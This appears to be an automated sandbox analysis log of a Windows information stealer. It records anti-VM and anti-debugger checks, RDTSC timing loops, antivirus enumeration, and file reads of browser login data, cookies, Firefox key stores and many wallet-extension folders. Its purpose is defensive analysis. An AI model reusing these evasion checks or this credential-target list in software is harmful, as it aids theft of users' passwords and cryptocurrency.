    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE055D second address: 4ED0DFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007F30F50FDE2Eh 0x00000010 test esi, esi 0x00000012 pushad 0x00000013 pushad 0x00000014 mov si, 9D73h 0x00000018 push eax 0x00000019 pop edx 0x0000001a popad 0x0000001b call 00007F30F50FDE34h 0x00000020 mov bl, cl 0x00000022 pop edi 0x00000023 popad 0x00000024 je 00007F3165E0BED6h 0x0000002a xor eax, eax 0x0000002c jmp 00007F30F50D755Ah 0x00000031 pop esi 0x00000032 pop edi 0x00000033 pop ebx 0x00000034 leave 0x00000035 retn 0004h 0x00000038 nop 0x00000039 xor ebx, ebx 0x0000003b cmp eax, 00000000h 0x0000003e je 00007F30F50FDFC3h 0x00000044 call 00007F30F90E092Eh 0x00000049 mov edi, edi 0x0000004b pushad 0x0000004c jmp 00007F30F50FDE2Ah 0x00000051 pushfd 0x00000052 jmp 00007F30F50FDE32h 0x00000057 sbb esi, 20B939A8h 0x0000005d jmp 00007F30F50FDE2Bh 0x00000062 popfd 0x00000063 popad 0x00000064 xchg eax, ebp 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4ED0DFF second address: 4ED0E03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4ED0E03 second address: 4ED0E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4ED0E09 second address: 4ED0E55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F30F4CF3448h 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F30F4CF3447h 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F30F4CF3440h 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4ED0E55 second address: 4ED0E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4ED0E59 second address: 4ED0E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4ED0E5F second address: 4ED0E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4ED0E65 second address: 4ED0EE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F30F4CF343Ch 0x00000015 jmp 00007F30F4CF3445h 0x0000001a popfd 0x0000001b movzx ecx, di 0x0000001e popad 0x0000001f pushfd 0x00000020 jmp 00007F30F4CF343Dh 0x00000025 sbb esi, 0F1DC1F6h 0x0000002b jmp 00007F30F4CF3441h 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F30F4CF343Dh 0x0000003a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EE0B95 second address: 4EE0B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EE0B9A second address: 4EE0BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F30F4CF343Dh 0x0000000a xor eax, 212C6156h 0x00000010 jmp 00007F30F4CF3441h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test al, al 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e call 00007F30F4CF343Ah 0x00000023 pop eax 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EE0BD7 second address: 4EE0BFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov bh, ch 0x0000000b popad 0x0000000c je 00007F3165DF1BC2h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F30F50FDE2Eh 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EF0B44 second address: 4EF0B69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F30F4CF343Ah 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EF0B69 second address: 4EF0B6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EF0B6F second address: 4EF0B80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F4CF343Dh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EF0B80 second address: 4EF0BAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F30F50FDE2Ch 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F30F50FDE33h 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EF0BAF second address: 4EF0BDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F30F4CF343Dh 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EF0BDD second address: 4EF0BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EF0BE3 second address: 4EF0BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EF0BE7 second address: 4EF0BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EF0BEB second address: 4EF0BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov eax, 668202A1h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EF0BFD second address: 4EF0C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], esi 0x00000009 jmp 00007F30F50FDE36h 0x0000000e mov esi, dword ptr [ebp+0Ch] 0x00000011 jmp 00007F30F50FDE30h 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 mov dx, si 0x0000001c mov si, 8D29h 0x00000020 popad 0x00000021 je 00007F3165DEB5A3h 0x00000027 pushad 0x00000028 call 00007F30F50FDE32h 0x0000002d mov cx, 7BD1h 0x00000031 pop eax 0x00000032 movsx ebx, si 0x00000035 popad 0x00000036 cmp dword ptr [75C4459Ch], 05h 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EF0C69 second address: 4EF0C6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EF0C6F second address: 4EF0CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F3165E03640h 0x0000000f jmp 00007F30F50FDE30h 0x00000014 xchg eax, esi 0x00000015 jmp 00007F30F50FDE30h 0x0000001a push eax 0x0000001b jmp 00007F30F50FDE2Bh 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov bx, FBA6h 0x00000028 movsx ebx, si 0x0000002b popad 0x0000002c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EF0D25 second address: 4EF0D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | RDTSC instruction interceptor: First address: 4EF0D2B second address: 4EF0DAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F30F50FDE34h 0x00000013 xor ecx, 53A54398h 0x00000019 jmp 00007F30F50FDE2Bh 0x0000001e popfd 0x0000001f jmp 00007F30F50FDE38h 0x00000024 popad 0x00000025 pop ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F30F50FDE2Dh 0x0000002f sbb ax, 83E6h 0x00000034 jmp 00007F30F50FDE31h 0x00000039 popfd 0x0000003a mov si, EE17h 0x0000003e popad 0x0000003f rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Special instruction interceptor: First address: F15C9B instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Special instruction interceptor: First address: F15D6D instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Special instruction interceptor: First address: 10E37B2 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe TID: 7760 | Thread sleep time: -30015s >= -30000s
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe TID: 7744 | Thread sleep time: -38019s >= -30000s
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe TID: 8116 | Thread sleep time: -180000s >= -30000s
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629729002.000000000109A000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: ASIr1Bo2x9.exe, ASIr1Bo2x9.exe, 00000000.00000003.1408503369.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1384966149.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629043916.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1299881367.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629043916.0000000000D59000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1375125685.0000000000D8B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629729002.000000000109A000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | System information queried: ModuleInformation
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Process information queried: ProcessInformation

    Anti Debugging

    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Open window title or class name: regmonclass
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Open window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Open window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Open window title or class name: ollydbg
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Open window title or class name: filemonclass
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: NTICE
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: SICE
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: SIWVID
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Process queried: DebugPort
    Source: ASIr1Bo2x9.exe, 00000000.00000002.1629916958.00000000010E1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: BProgram Manager
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: ASIr1Bo2x9.exe, ASIr1Bo2x9.exe, 00000000.00000003.1390007409.00000000058E2000.00000004.00000800.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1392566112.00000000058E5000.00000004.00000800.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1388880431.00000000058E2000.00000004.00000800.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1408503369.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1629043916.0000000000D89000.00000004.00000020.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000003.1385574336.00000000058E2000.00000004.00000800.00020000.00000000.sdmp, ASIr1Bo2x9.exe, 00000000.00000002.1632008353.00000000058E5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

    Stealing of Sensitive Information

    Source: Yara match | File source: sslproxydump.pcap, type: PCAP
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffffla
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
